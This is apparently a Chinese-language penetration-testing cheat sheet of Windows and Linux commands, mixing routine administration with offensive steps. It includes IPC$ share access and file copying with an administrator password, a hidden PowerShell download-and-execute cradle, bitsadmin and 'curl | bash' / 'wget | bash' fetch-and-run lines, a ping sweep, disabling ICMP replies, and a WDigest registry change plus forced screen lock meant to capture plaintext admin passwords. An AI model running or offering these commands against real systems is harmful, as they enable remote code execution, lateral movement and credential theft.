cmd:runas /noprofile /user:administrator cmd
netsh wlan show profiles wifi名 key=clear
命名管道,可以通过ipc进行对主机远程管理和文件传输,基于139、445端口的开放
net use \\IP | 主机名\IPC$ "管理员密码" /user:administrator 管理员必须有设置密码且已经激活
net session(这一步需要管理员)
net use \\IP /del
dir \\IP | 主机名\C$
copy \\IP | 主机名\C$ 文件名 下载文件
copy 文件名 \\IP | 主机名\C$ 上传文件
powershell -nop -w hidden -c "IEX ((New-Object Net.WebClient).DownloadString(‘文件路径‘))"
bitsadmin /transfer /n http://IP/xx.vbs path
systemctl status firewalld
systemctl stop firewalld
systemctl disable firewalld
systemctl enable firewalld
ss -antpl | grep 80
-a 显示全部
-n数字显示IP
-t tcp协议
-p 代表PID
-l 监听状态
wget -qO - http://IP/File | bash
curl http://IP/File | bash
apt-get update
apt-get upgrade
vim /etc/apt/sources.list
apt-get update
vim ~/.bashrc
PS1=‘\[\e[1;33m\]\u@\h:\[\e[1;32m\]\W\[\e[37m\]#\[\e [m\ ] ‘
apt-get install python3-pip
mv xxx.elf /usr/bin/xxx.elf
echo 1 >/proc/sys/net/ipv4/icmp_echo_ignore_all
或sysctl -w net.ipv4.icmp_echo_ignore_all=1 >/dev/null
开启将1改成0
for /L %i in (1,1,254) do @ping -w 1 -n 1 192.168.37.%i | findstr "TTL="
修改注册表:
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /vUseLogonCredential /t REG_DWORD /d 1 /f
强制锁屏让管理员重登入后才可以抓到明文密码:
rundll32 user32.dll,LockWorkStation
原文:https://www.cnblogs.com/caihon/p/14923565.html